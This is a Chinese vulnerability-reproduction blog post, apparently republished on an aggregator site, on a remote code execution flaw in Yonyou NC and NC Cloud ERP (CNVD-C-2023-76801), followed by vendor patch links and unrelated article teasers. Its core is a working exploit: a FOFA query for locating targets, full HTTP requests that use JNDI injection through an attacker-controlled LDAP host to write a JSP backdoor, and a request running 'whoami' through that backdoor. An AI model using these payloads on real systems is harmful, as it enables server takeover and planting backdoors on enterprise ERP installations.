CNVD-C-2023-76801:用友NC uapjs RCE漏洞复现[附POC]

news2024/12/26 22:41:41

文章目录

  • 用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801) [附POC]
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响版本
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现
    • 0x06 修复建议

用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801) [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs (jsinvoke)应用构造恶意请求非法上传后门程序此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。

0x03 影响版本

NC63、NC633、NC65、NC Cloud1903、NC Cloud1909、NC Cloud2005、NC Cloud2105、NC Coud2111、YonBIP高级版2207

0x04 漏洞环境

FOFA语法: app=“用友-NC-Cloud”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (传参中的dnslog自行替换

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: ip:port
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-formurlencoded
Content-Length: 285

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://fpslmjsgkm.dgrh3.cn')}","webapps/nc_web/nccloud.jsp"]}

PS:(利用思路):调用”nc.itf.iufo.IBaseSPService“服务中的"saveXStreamConfig"的方法,来接受对象和字符串,使用Java反射机制创建了一个javax.naming.InitialContext对象,并通过LDAP协议连接到指定的IP地址和端口,最后在根目录生成jsp恶意后门程序。

3.复现

PS:传参中的dnslog自行替换
在这里插入图片描述
访问上传的文件nccloud.jsp
在这里插入图片描述发现有记录显示,说明此漏洞存在!!!
在这里插入图片描述

EXP (VPSip请自行切换):

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: ip:port
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
 
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/cloud.jsp"]}

PS:EXP中使用的是JNDI工具的TomcatEcho回显链

上传恶意文件
在这里插入图片描述

JNDI注入工具开启监听后
在这里插入图片描述

执行命令whoami:

GET /nccloud.jsp HTTP/1.1
Host: ip:port
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
cmd:whoami

在这里插入图片描述在这里插入图片描述

0x06 修复建议

打对应补丁,重启服务,各版本补丁获取方式如下:

NC63方案

补丁名称:NC63uapjs安全问题补丁
补丁编码:NCM_NC6.3_000_UAP_BTS_20230308_GP_268498360
https://dsp.yonyou.com/patchcenter/patchdetail/10231678268499522701/0/2
NC633方案

补丁名称:NC633uapjs安全问题补丁
补丁编码:NCM_NC6.33_000_UAP_BTS_20230308_GP_268527193
https://dsp.yonyou.com/patchcenter/patchdetail/10231678268528400707/0/2
NC65方案

补丁名称:NC65uapjs安全问题补丁
补丁编码:NCM_NC6.5_000_UAP_BTS_20230308_GP_269462199
https://dsp.yonyou.com/patchcenter/patchdetail/10231678269463403718/0/2
NCC1903方案

补丁名称:NCC1903uapjs安全问题补丁
补丁编码:NCM_NCCLOUD1903_10_UAP_BTS_20230308_GP_268560504
https://dsp.yonyou.com/patchcenter/patchdetail/11231678268561687890/0/2
NCC1909方案

补丁名称:NCC1909uapjs安全问题补丁
补丁编码:NCM_NCCLOUD1909_10_UAP_BTS_20230308_GP_268596672
https://dsp.yonyou.com/patchcenter/patchdetail/11231678268597774895/0/2
NCC2005方案

补丁名称:NCC2005uapjs安全问题补丁
补丁编码:NCM_NCCLOUD2020.05_10_UAP_BTS_20230308_GP_268622200
https://dsp.yonyou.com/patchcenter/patchdetail/10231678944167066463/0/2
NCC2105方案

补丁名称:NCC2105uapjs安全问题补丁
补丁编码:NCM_NCCLOUD2021.05_10_UAP_BTS_20230308_GP_268652747
https://dsp.yonyou.com/patchcenter/patchdetail/11231678268653876905/0/2
NCC2111方案

补丁名称:NCC2111uapjs安全问题补丁
补丁编码:NCM_NCCLOUD2021.11_010_UAP_BTS_20230308_GP_268680318
https://dsp.yonyou.com/patchcenter/patchdetail/11231678268681473910/0/2
YonBIP高级版2207方案

补丁名称:YonBIP高级版2207uapjs安全问题补丁
补丁编码:NCM_YONBIP高级2207_010_UAP_BTS_20230308_GP_267337472
https://dsp.yonyou.com/patchcenter/patchdetail/11231678267338650434/0/2

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1185012.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

擎创动态 | 开箱即用!擎创科技联合中科可控推出大模型一体机

一、金融行业大模型一体机发布 10月26日至27日,2023金融科技安全与创新大会顺利召开。会上,中科可控联合擎创科技、卓世科技、文因互联、百川智能、捷通华声、智谱华章、易道博识等9大厂商,发布了9款金融行业大模型一体机,为金融…

ZYNQ_project:key_led

条件里是十进制可以不加进制说明,编译器默认是10进制,其他进制要说明。 实验目标: 模块框图: 时序图: 代码: include "para.v"module key_filter (input wire …

opengauss权限需求

创建角色 "u_rts" 并授予对数据库 "rts_opsdb" 的只读权限: CREATE ROLE u_rts LOGIN PASSWORD Cloud1234; GRANT CONNECT ON DATABASE rts_opsdb TO u_rts; GRANT USAGE ON SCHEMA public TO u_rts; GRANT SELECT ON ALL TABLES IN SCHEMA pub…

二维码智慧门牌管理系统升级解决方案:轻松实现辖区范围门址统计

文章目录 前言一、系统功能与优势 前言 在这个数字化时代,传统的门牌管理系统已经无法满足现代管理的需求。为了满足辖区内门址的统计需求,我们引入了全新的二维码智慧门牌管理系统升级解决方案。这一升级将让您轻松实现辖区范围门址的统计,…

虹科分享 | 一文带你了解增强现实(AR)技术的前世今生

引言:增强现实(Augmented Reality, AR)技术在近几年大放光彩,您可能在《头号玩家》或《黑镜》等影视作品中看到过人们对AR技术的其奇思妙想,也可能从科普文章中了解过“元宇宙”、“数字孪生”等概念,您还可…

如何安装 StoneDB 2.0 企业版? | StoneDB 使用教程 #2

通过二进制TAR包安装(CentOS 7.X) 下载安装包 stonedb-ee-8.0-v2.1.0.el7.x86_64.tar.gz 下载地址:https://www.stoneatom.com/download 解压安装包 tar -zxvf stonedb-ee-8.0-v2.1.0.el7.x86_64.tar.gz -C /opt 依赖检查 ldd -r /opt/st…

Cordova插件开发三:通过广播实现应用间跨进程通信

文章目录 1.最终效果预览2.数据发送3.插件接受数据4.JS页面中点击获取数据返回1.最终效果预览 场景说明:我们给自来水公司开发了一个h5应用,需要对接第三方厂家支持硬件设备以便于获取到高精度定位数据,之前几篇文件写过,我已经集成过南方测绘RTK和高精度定位模块的设备,厂…

传感器数据采集:采样定理(奈奎斯特定理)

采样定理是连续时间信号(通常称为“模拟信号”)和离散时间信号(通常称为“数字信号”)之间的基本桥梁。该定理说明采样频率与信号频谱之间的关系,是连续信号离散化的基本依据。 它为采样率建立了一个足够的条件&#x…

Redis 线程、持久化和监控

Redis 线程、持久化和监控 Redis线程模型 Redis主线程模型 图1 Redis 6.0之前的主线程模型 IO多路复用程序指的是单个线程监听多个套接字连接(Socket),当IO多路复用程序将多个Socket上的就绪事件放置于队列中, Redis主线程一次处…

Codeforces Round 908 (Div. 2)题解

目录 A. Secret Sport 题目分析: B. Two Out of Three 题目分析: C. Anonymous Informant 题目分析: A. Secret Sport 题目分析: A,B一共打n场比赛,输入一个字符串由A和‘B’组成代表A赢或者B赢(无平局),因为题目说明这个人…

玩一玩MySQL8.0.35

文章目录 1 下载MySQL2 安装MySQL2.1 选择安装类型2.2 安装组件2.3 产品配置3 启动MySQL Shell4 使用MySQL Workbench4.1 创建数据库连接4.2 查看数据库列表4.3 创建数据库vue4.4 将csv导入数据库4.5 查看导入的表1 下载MySQL 网址:https://dev.mysql.com/downloads/installer…

Ansible优化大全

文章目录 一、关闭系统信息收集二、开启加速 Ansible 执行速度修改配置文件/etc/ansible/ansible.cfg由于该功能与sudo冲突,必须关闭 requiretty 选项方法一方法二 参考文章: https://blog.csdn.net/o0o0o0D/article/details/110998873 一、关闭系统信息…

【C#枚举 Enum】

C#枚举 Enum 一、枚举 1、枚举是将变量的值罗列出来,变量的值只限于列举出来的值的范围。 2、枚举使用enum关键字来声明,与类同级。枚举本身可以有修饰符,但枚举的成员始终是公共的,不能有访问修饰符。枚举本身的修饰符仅能使用public和int…

java项目之个人健康信息管理(ssm+jsp)

项目简介 个人健康信息管理实现了以下功能: 管理员:首页、个人中心、用户管理、医师管理、饮食记录管理、运动记录管理、健康信息管理、健康评估管理、健康知识管理、系统管理。用户:首页、个人中心、饮食记录管理、运动记录管理、健康信息…

3D全景技术,为我们打开全新宣传领域

随着科技的发展,3D全景技术正在融入我们的生活,这种全新视觉体验方式为我们打开了一扇全新的宣传领域,可以让我们多方位、多视角地探索各个行业,无论是对教育、商业、还是其他领域,都产生了深远的影响。 3D全景技术结合…

QTabBar实验

目的: 研究QTabBar::currentChanged与QTabBar::tabBarClicked这两个信号的触发条件。 现象: 最开始时,信号都未被触发。 当点击标签时,两个信号都被触发,如下图: 而使用 tab_bar->setCurrentIndex(…

领导说,效率越高的人,越擅长数据可视化

领导说效率越高的人,就越擅长数据可视化,因为他们总能找到操作简单、指标计算又快又准、分析效率极高的数据可视化工具,比如说奥威BI数据可视化工具。 奥威BI数据可视化工具,集齐一个高效BI数据可视化工具的五大使用优点&#xf…

Unix环境高级编程-学习-02-进程环境之进程终止、命令行参数、环境表、C程序的存储空间布局

目录 一、环境信息 二、声明 三、进程终止 1、情况分类 2、退出函数 3、退出实验 (1)main声明int和调用return值 (2)main声明int和不调用return (3)main声明不int和不调用return 4、atexit 5、at…

chrome安装vue devtools

不能访问应用商店 如果可以访问应用商店可以往下看 插件源代码 选择shell-chrome,这是官方的插件源码 下载源代码打包 参考教程 点击扩展按钮->管理扩展程序->打开开发者模式->把crx文件拖拽进去即可 可以访问chrome应用商店 插件地址 官方文档地址 选…

浅谈开源策略的实例:CGAL计算几何库

免责声明:本博客旨在分享我对开源策略的理解和体会,不代表任何组织或机构的立场或观点,也不构成任何商业或投资的建议或担保。本博客的内容可能存在错误或遗漏,也可能随着时间的推移而变得过时或不适用。请在使用或依赖本博客的内…